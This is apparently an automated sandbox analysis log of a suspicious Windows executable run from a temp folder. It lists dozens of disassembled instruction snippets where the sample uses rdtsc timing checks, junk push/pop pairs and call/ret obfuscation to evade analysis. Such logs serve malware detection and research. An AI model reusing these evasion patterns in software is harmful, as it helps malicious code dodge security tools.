Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 58C546 second address: 58C574 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F12E0FAFC76h 0x00000009 jmp 00007F12E0FAFC82h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F12E0FAFC7Ch 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 58C574 second address: 58C57A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 58C57A second address: 58C57E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 58C57E second address: 58C597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jng 00007F12E108FDB6h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 591E52 second address: 591E5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 591E5B second address: 591E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 591E61 second address: 591E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 591E69 second address: 591E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 591FC6 second address: 591FD8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F12E0FAFC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F12E0FAFC76h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 592418 second address: 592420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 592420 second address: 592424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 592424 second address: 59242A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59242A second address: 592447 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F12E0FAFC76h 0x00000009 jg 00007F12E0FAFC76h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F12E0FAFC76h 0x0000001b push edi 0x0000001c pop edi 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 592447 second address: 59245D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jng 00007F12E108FDB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F12E108FDBEh 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 593CBE second address: 593CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 595945 second address: 595949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 595B14 second address: 595B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 595B18 second address: 595B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 595B31 second address: 595B51 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F12E0FAFC78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F12E0FAFC7Ah 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 595B51 second address: 595B55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 595D85 second address: 595D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 595E17 second address: 595E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 595E1B second address: 595E2B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F12E0FAFC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 595E2B second address: 595E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F12E108FDB6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F12E108FDB6h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 595E3E second address: 595E42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 595FD4 second address: 595FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5968C1 second address: 5968C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 596B7B second address: 596B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 596B7F second address: 596B98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59940B second address: 59940F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59940F second address: 599420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jg 00007F12E0FAFC76h 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 599EBD second address: 599EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F12E108FDBCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 599EC9 second address: 599F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push eax 0x00000009 call 00007F12E0FAFC78h 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 add dword ptr [esp+04h], 0000001Bh 0x0000001b inc eax 0x0000001c push eax 0x0000001d ret 0x0000001e pop eax 0x0000001f ret 0x00000020 add edi, dword ptr [ebp+122D2403h] 0x00000026 movsx edi, si 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F12E0FAFC78h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 push 00000000h 0x00000047 mov edi, dword ptr [ebp+122D2A3Ch] 0x0000004d xchg eax, ebx 0x0000004e pushad 0x0000004f pushad 0x00000050 push edx 0x00000051 pop edx 0x00000052 pushad 0x00000053 popad 0x00000054 popad 0x00000055 pushad 0x00000056 js 00007F12E0FAFC76h 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59A9DA second address: 59A9FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59A9FB second address: 59AA78 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F12E0FAFC78h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F12E0FAFC78h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 add dword ptr [ebp+122D213Bh], esi 0x00000046 push 00000000h 0x00000048 push 00000000h 0x0000004a push ebx 0x0000004b call 00007F12E0FAFC78h 0x00000050 pop ebx 0x00000051 mov dword ptr [esp+04h], ebx 0x00000055 add dword ptr [esp+04h], 00000014h 0x0000005d inc ebx 0x0000005e push ebx 0x0000005f ret 0x00000060 pop ebx 0x00000061 ret 0x00000062 push eax 0x00000063 pushad 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59B596 second address: 59B5A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F12E108FDBCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59B5A4 second address: 59B620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F12E0FAFC78h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 call 00007F12E0FAFC7Fh 0x00000027 xor edi, dword ptr [ebp+122D1E6Eh] 0x0000002d pop esi 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F12E0FAFC78h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a pushad 0x0000004b or bx, 9BDAh 0x00000050 mov cl, bh 0x00000052 popad 0x00000053 push 00000000h 0x00000055 jg 00007F12E0FAFC76h 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F12E0FAFC7Fh 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59C12C second address: 59C132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59C132 second address: 59C136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A09C8 second address: 5A09CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A09CC second address: 5A09D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A09D0 second address: 5A09DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A09DD second address: 5A09E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A09E1 second address: 5A0A7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F12E108FDC6h 0x0000000e popad 0x0000000f nop 0x00000010 or di, 43E4h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F12E108FDB8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 cmc 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F12E108FDB8h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e jmp 00007F12E108FDBBh 0x00000053 xchg eax, esi 0x00000054 push esi 0x00000055 js 00007F12E108FDB8h 0x0000005b push eax 0x0000005c pop eax 0x0000005d pop esi 0x0000005e push eax 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 jng 00007F12E108FDB6h 0x00000068 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A0A7D second address: 5A0A8B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F12E0FAFC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A2A81 second address: 5A2A85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A3BC1 second address: 5A3BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A3BC5 second address: 5A3BDE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jne 00007F12E108FDB8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F12E108FDB6h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A5C3A second address: 5A5C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A5C3E second address: 5A5C44 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A7A7F second address: 5A7A92 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F12E0FAFC78h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A7A92 second address: 5A7A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A7A96 second address: 5A7A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A7A9A second address: 5A7AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A9AF0 second address: 5A9AFE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F12E0FAFC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5AB9FC second address: 5ABA07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5ABA07 second address: 5ABA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F12E0FAFC7Bh 0x00000011 jmp 00007F12E0FAFC7Bh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5ABA29 second address: 5ABA32 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5ABA32 second address: 5ABA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F12E0FAFC7Dh 0x0000000b jmp 00007F12E0FAFC7Eh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5AC028 second address: 5AC034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5AC034 second address: 5AC039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5AC039 second address: 5AC03E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5AC03E second address: 5AC0C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F12E0FAFC78h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov edi, 67F203DAh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F12E0FAFC78h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 sbb di, F5D7h 0x0000004a xchg eax, esi 0x0000004b jo 00007F12E0FAFC8Ah 0x00000051 pushad 0x00000052 jmp 00007F12E0FAFC80h 0x00000057 push edi 0x00000058 pop edi 0x00000059 popad 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e jne 00007F12E0FAFC76h 0x00000064 jne 00007F12E0FAFC76h 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5B0F7B second address: 5B0F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F12E108FDBFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5B743D second address: 5B7443 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C1EFE second address: 5C1F36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F12E108FDC5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c ja 00007F12E108FDDEh 0x00000012 jl 00007F12E108FDC2h 0x00000018 jmp 00007F12E108FDBCh 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C1F36 second address: 5C1F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C23F4 second address: 5C23FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C26D3 second address: 5C26DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C26DB second address: 5C26FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F12E108FDB6h 0x0000000a jmp 00007F12E108FDBDh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F12E108FDB6h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C6CB8 second address: 5C6CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C6CBC second address: 5C6CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C6CC0 second address: 5C6CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F12E0FAFC82h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C6CDA second address: 5C6CE4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F12E108FDBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C6FF6 second address: 5C7034 instructions: 0x00000000 rdtsc 0x00000002 js 00007F12E0FAFC76h 0x00000008 jmp 00007F12E0FAFC85h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007F12E0FAFC8Fh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C7175 second address: 5C7198 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F12E108FDC3h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop ecx 0x00000015 rdtsc
